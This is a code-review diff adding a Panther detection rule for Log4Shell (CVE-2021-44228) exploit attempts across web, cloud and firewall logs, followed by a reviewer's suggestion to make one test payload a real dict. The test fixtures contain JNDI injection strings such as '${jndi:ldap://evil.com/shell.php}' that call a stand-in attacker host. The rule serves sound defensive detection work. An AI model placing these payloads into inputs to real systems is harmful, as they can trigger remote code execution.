panther_ioc_rules/log4j_exploit_iocs.yml

```
@@ -0,0 +1,76 @@
+AnalysisType: rule
+Filename: log4j_exploit_iocs.py
+RuleID: IOC.Log4jExploit
+DisplayName: Log4J Exploit IOC Search
+Enabled: True
+LogTypes:
+  - AWS.ALB
+  - AWS.CloudTrail
+  - AWS.S3ServerAccess
+  - AWS.VPCFlow
+  - Apache.AccessCombined
+  - Apache.AccessCommon
+  - Cloudflare.Firewall
+  - Cloudflare.HttpRequest
+  - Fastly.Access
+  - GCP.AuditLog
+  - Juniper.Access
+  - Juniper.Firewall
+  - Nginx.Access
+  - Syslog.RFC3164
+  - Syslog.RFC5424
+
+Tags:
+  - AWS
+  - GCP
+  - Web
+  - Log4J
+Severity: Critical
+Description: >
+  Monitors for potential exploit attempts agains CVE-2021-44228, Log4J remote code execution
+Reference: >
+  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
+Runbook: >
+  Investigate exploit attempt event content to determine scope and type of exploitation. Patch Log4J to the latest patched version
+SummaryAttributes:
+  - p_any_domain_names
+  - p_any_ipaddresses
+
+Tests:
+  -
+    Name: Exploit Detected in Event (String)
+    ExpectedResult: true
+    Log:
+      {
+        "src_addr": "10.10.10.123",
+        "dst_addr": "10.10.10.124",
+        "payload" : "${jndi:ldap://evil.com/shell.php}"
+      }
+
+  -
+    Name: Exploit Detected in Event (List)
+    ExpectedResult: true
+    Log:
+      {
+        "src_addr": "10.10.10.123",
+        "dst_addr": "10.10.10.124",
+        "payload" : "['${jndi:nis://evil.com/shell.php}', 'foobar']"
+      }
+  -
+    Name: Exploit Detected in Event (Dict)
+    ExpectedResult: true
+    Log:
+      {
+        "src_addr": "10.10.10.123",
+        "dst_addr": "10.10.10.124",
+        "payload" : "{'foo':'${jndi:ldap://evil.com/shell.php}', 'bar':'baz'}"
```

This is still a string

```suggestion
        "payload" : {"foo": "${jndi:ldap://evil.com/shell.php}", "bar": "baz"}
```

This should test for a dict